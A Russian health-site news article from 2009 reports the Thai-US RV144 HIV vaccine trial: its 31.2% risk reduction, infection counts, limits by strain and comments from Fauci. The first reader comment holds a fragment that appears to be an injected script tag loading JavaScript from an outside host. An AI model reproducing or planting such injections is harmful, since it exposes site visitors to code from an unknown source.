Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Создана вакцина против СП...  >>  Создана вакцина против СПИДа?
 
Обратная связь
 

Создана вакцина против СПИДа?

Размер шрифта
22 сентября 2009 05:00
  • google_analytics: false
  • Нравится

«Коктейль» из двух бесперспективных вакцин оказался действенным средством профилактики ВИЧ-инфекции

В результате совместного крупномасштабного исследования, в котором участвовали 16 тысяч добровольцев, американским и тайским ученым удалось создать препарат, снижающий риск заболевания СПИДом на 31,2%. Об этом было объявлено в четверг, 24 сентября.

На снимке: Министр здравоохранения Таиланда Виттая Каевпарадаи (Witthaya Kaewparadai) и посол США в Таиланде Эрик Джон (Eric John) на специальной пресс-конференции объявили об успешных результатах самого масштабного из когда-либо проводившихся испытаний вакцины против ВИЧ-инфекции. Фото © The New York Times

Как это нередко бывает в генной инженерии, открытие стало почти случайным. Препарат RV144 был получен в результате смешения двух вакцин – ALVAC и AIDSVAX, ранее применявшихся по отдельности и не принесших положительных результатов в борьбе с вирусом.

Поначалу «коктейль» был испытан на нескольких пациентах и оказался настолько успешным, что было принято решение о масштабной проверке, к которой привлекли 16 000 жителей Таиланда, страны с очень высоким показателем по заболеваемости СПИДом – достаточно сказать, что примерно каждый сотый таец в настоящее время является носителем ВИЧ-инфекции. К участию в испытаниях, строго на добровольной основе, были допущены мужчины и женщины в возрасте от 18-ти до 30-ти лет, не зараженные ВИЧ-инфекцией (все волонтеры подверглись тщательным предварительным обследованиям).

На снимке: «Тихий час» в таиландском хосписе для больных СПИДом «Уот Фрабатнампо» (Wat Phrabatnampo AIDS hospice). Фото © The Associated Press

 

Эксперимент стал рекордным не только по числу принявших в нем участие добровольцев, но и по продолжительности – испытания велись в течение трех лет с промежуточными обследованиями каждые полгода.

Испытуемых разбили на две равные группы, участникам одной из которых вводился настоящий RV144; вторая группа получала плацебо (безвредный препарат, назначаемый под видом какого-либо лекарственного средства).

По истечении трех лет ученые провели завершающее обследование всех участников эксперимента, в результате которого выяснилось, что в группе, получившей настоящий препарат, ВИЧ-инфекцией заразился 51 человек, тогда как в контрольной группе число заболевших составило 74.

Таким образом, применение RV144 примерно на треть снизило заболеваемость СПИДом, но!.. Следует учесть, что результаты данного эксперимента верны по отношению лишь к двум штаммам ВИЧ – «E», циркулирующему в Таиланде (шире – в Юго-Восточной Азии), и «B», распространенному в США и Европе. Вполне вероятно, что полученная вакцина бессильна против ВИЧ-штамма «C», преобладающего в странах Африки. Исследования на этот счет еще предстоит провести.

– Я не стал бы называть это словом «прорыв», но считаю, что нам удалось получить очень важный результат, – сказал в интервью газете The New York Times руководитель исследований доктор Энтони Фаучи, директор Национального института аллергических и инфекционных болезней США. – На протяжении предшествующих двадцати лет все испытания были неудачными, мы как бы блуждали в кромешной тьме, и вот теперь как бы нащупали выход.

На снимке: Доктор Энтони Фаучи (Dr. Anthony Fauci), директор Национального института аллергических и инфекционных болезней США. Фото © NIH (National Institutes of Health)

______________________________________________________________________

Справка "Здоровье инфо":

C момента открытия в 1983 году вируса СПИДа от этой болезни во всем мире умерло более 25 миллионов человек. На сегодняшний день число ВИЧ-инфицированных на планете превысило 45 миллионов человек.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:38

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

01 июля 2015 в 00:58

Комментарий удален за нарушение Правил общения

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.